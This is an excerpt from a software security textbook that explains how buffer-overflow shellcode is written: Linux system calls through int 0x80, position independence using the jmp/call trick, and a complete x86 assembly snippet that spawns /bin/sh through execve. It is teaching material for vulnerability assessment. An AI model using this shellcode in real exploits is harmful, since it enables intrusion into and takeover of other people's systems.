The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities

Buffer overflows are usually exploited by directing execution to a known location in memory where attacker-controlled data is stored. For an exploit to be successful, this location must contain executable machine code that allows attackers to perform malicious activities. This is achieved by constructing small snippets of machine code designed to launch a shell, connect back to the originating user, or do whatever the attacker chooses. At the time of this writing, the most common trend in shellcode construction uses stubs capable of loading additional components on demand over a connected socket, as needed by an attacker on the other end.

Writing the Code

At the most basic level, shellcode is a small chunk of position-independent code that uses system APIs to achieve your objectives. To see how this is done, consider the simple case of spawning a shell in UNIX. In this case, the code you want to run is roughly the following:

char *args[] = { "/bin/sh", NULL }; execve("/bin/sh", args, NULL);

This simple code spawns a command shell when it runs. If this code were run in a network service, the socket descriptor the user is connected with would need to be duplicated over stdin, stdout, and optionally stderr as well.

To construct the machine code required to spawn the shell, you need to understand how this code works at a lower level. The execve() function is exported by the standard C library, so a normal program would first locate the libc execve() implementation with a little help from the loader, and then call it. Because this functionality could be difficult to duplicate in reasonably sized shellcode, generally you want to look for a simpler solution. As it turns out, execve() is also a system call on UNIX systems, and all the libc function does is perform the system call.

Invoking system calls on an Intel-based OS usually involves building an argument list (in registers or on the stack, depending on the OS), and then asking the kernel to perform a system call on behalf of the process. This can be done with a variety of methods. For Intel systems, the system call functionality can rely on a software interrupt, initiated by the int instruction; a call gate, invoked with an lcall; or special-purpose machine support, such as sysenter. For Linux and many BSD variants, the int 128 interrupt is reserved for system calls. When this interrupt is generated, the kernel handles it, determines that the process needs some system function performed, and carries out the requested task. The procedure for Linux systems is as follows:

1.

Put the system call parameters in general-purpose registers starting at EBX. If a system call requires more than five parameters, additional parameters are placed on the stack.

2.

Put the system call number of the desired system call in EAX.

3.

Use the int 128 instruction to perform the system call.

So the assembly code would look something like this initially:

xorl %eax, %eax ; zero out EAX movl %eax, %edx ; EDX = envp = NULL movl $address_of_shell_string, %ebx; EBX = path parameter movl $address_of_argv, %ecx; ECX = argv movb $0x0b ; syscall number for execve() int $0x80 ; invoke the system call

Nearly all functionality you need when you create shellcode consists of a series of system calls and follows the same basic principles presented here. In Windows, the system call numbers aren't consistent in OS versions, so most Windows shellcode loads system libraries and calls functions in those libraries. A hacker group known as Last Stage of Delirium (LSD) documented the basis for what's used to write most modern Windows shellcode at www.lsd-pl.net/projects/winasm.zip.

Finding Your Code in Memory

The constructed machine code snippets must be position independentthat is, they must be able to run successfully regardless of their location in memory. To understand why this is important, consider the example in the previous section; you need to provide the address of the argument array vector and the address of the string "/bin/sh" for the pathname parameter. By using absolute addresses, you limit your shellcode's reliability to a large degree and would need to modify it for every exploit you write. Therefore, you should have a method of determining these addresses dynamically, regardless of the process environment in which the code is running.

Usually, on Intel x86 CPUs, the strings or data required by shellcode is supplied alongside the code and their address is calculated independently. To understand how this works, consider the semantics of the call instruction. This function implicitly saves a return address on the stack; which is the address of the first byte after the call instruction. Therefore, shellcode is often constructed with the following format:

jmp end code: ... shellcode ... end: call code .string "/bin/sh"

This example jumps to the end of the code and then uses call to run code located directly after the jmp instruction. What is the point of this indirection? Basically, you have the relative address of the string "/bin/sh" located on the stack because of the call instruction implicitly pushing a return address on the stack. Hence, the address of "/bin/sh" can be calculated automatically, regardless of where the shellcode is located in the target application. Combining this with the information in the previous section, execve() shellcode would look something like this:

jmp end code: popl %ebx ; EBX = pathname argument xorl %eax, %eax ; zero out EAX movl %eax, %edx ; EDX = envp pushl %eax ; put NULL in argv array pushl %ebx ; put "/bin/sh" in argv array movl %esp, %ecx ; ECX = argv movb $0x0b, %al ; 0x0b = execve() system call int $0x80 ; system call call code .string "/bin/sh"

As you can see, the code to start a shell is fairly straightforward; you simply need to fill EBX, ECX, and EDX with pathname, argv, and envp respectively, and then invoke a system call. This example is a simple shellcode snippet, but more complex shellcode is based on the same principles.

Категории